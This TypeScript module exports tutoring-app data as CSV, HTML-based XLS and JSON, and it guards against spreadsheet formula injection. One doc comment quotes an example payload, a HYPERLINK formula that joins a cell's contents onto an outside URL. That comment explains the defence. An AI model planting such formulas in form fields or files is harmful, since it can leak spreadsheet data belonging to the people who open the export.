/**
 * Turning a list on screen into a file the tutor's accountant can open.
 *
 * Three formats because they answer three different questions. CSV is the
 * lowest common denominator. XLS is what Excel opens without an import wizard
 * and without mangling a Hebrew column. JSON is the one that survives a round
 * trip without losing a type.
 */

/** A row is column title to cell value, in the order the columns appear. */
export type ExportRow = Record<string, string | number | null>;

function download(content: BlobPart, filename: string, type: string): void {
  const url = URL.createObjectURL(new Blob([content], { type }));
  const link = document.createElement('a');
  link.href = url;
  link.download = filename;
  link.click();
  // Revoked on the next tick rather than immediately: Safari has not finished
  // reading the blob when click() returns.
  window.setTimeout(() => URL.revokeObjectURL(url), 1000);
}

/**
 * A cell that a spreadsheet will treat as text, whatever it starts with.
 *
 * Excel, Sheets and LibreOffice all read a cell beginning with `=`, `+`, `-`,
 * `@` or a leading tab/carriage return as a formula, and they do it on open,
 * not on edit. A student's name reaches this file from a public intake form
 * that anyone with the link can submit, so `=HYPERLINK("http://…"&A1,"click")`
 * typed into a name field would run in the tutor's spreadsheet the moment they
 * opened their own export. Prefixing with an apostrophe is the mitigation
 * every spreadsheet understands: it forces the value to text and the
 * apostrophe itself is not displayed.
 */
function neutralizeFormula(text: string): string {
  return /^[=+\-@\t\r]/.test(text) ? `'${text}` : text;
}

function csvCell(value: string | number | null): string {
  // Numbers are ours, not the tutor's customers': a real number must not be
  // turned into text or the accountant's totals stop working.
  if (typeof value === 'number') return String(value);
  const text = neutralizeFormula(value === null ? '' : String(value));
  return /[",\n\r]/.test(text) ? `"${text.replace(/"/g, '""')}"` : text;
}

/**
 * A UTF-8 BOM leads the file. Without it Excel on Windows reads the bytes as
 * the system codepage and every Hebrew name comes out as mojibake, which is
 * the single most common way a working export looks broken.
 */
export function exportCsv(rows: ExportRow[], filename: string): void {
  if (rows.length === 0) return;
  const columns = Object.keys(rows[0]!);
  const lines = [
    columns.map(csvCell).join(','),
    ...rows.map(row => columns.map(column => csvCell(row[column] ?? null)).join(','))
  ];
  download(`﻿${lines.join('\r\n')}`, `${filename}.csv`, 'text/csv;charset=utf-8');
}

function escapeHtml(value: string | number | null): string {
  const text = typeof value === 'number' ? String(value) : neutralizeFormula(String(value ?? ''));
  return text
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

/**
 * An HTML table saved as .xls. Excel has opened this since 1997 and it keeps
 * the encoding and the column boundaries, which a CSV does not guarantee.
 * Writing a real XLSX would mean shipping a zip writer for one button.
 */
export function exportXls(rows: ExportRow[], filename: string): void {
  if (rows.length === 0) return;
  const columns = Object.keys(rows[0]!);
  const head = columns.map(column => `<th>${escapeHtml(column)}</th>`).join('');
  const body = rows
    .map(row => `<tr>${columns.map(column => `<td>${escapeHtml(row[column] ?? '')}</td>`).join('')}</tr>`)
    .join('');
  const html = `<html dir="rtl"><head><meta charset="utf-8"></head>`
    + `<body><table><thead><tr>${head}</tr></thead><tbody>${body}</tbody></table></body></html>`;
  download(`﻿${html}`, `${filename}.xls`, 'application/vnd.ms-excel;charset=utf-8');
}

export function exportJson(data: unknown, filename: string): void {
  download(JSON.stringify(data, null, 2), `${filename}.json`, 'application/json');
}

/** Today, as YYYY-MM-DD, for stamping a filename. */
export function exportStamp(at: Date = new Date()): string {
  return `${at.getFullYear()}-${String(at.getMonth() + 1).padStart(2, '0')}-${String(at.getDate()).padStart(2, '0')}`;
}
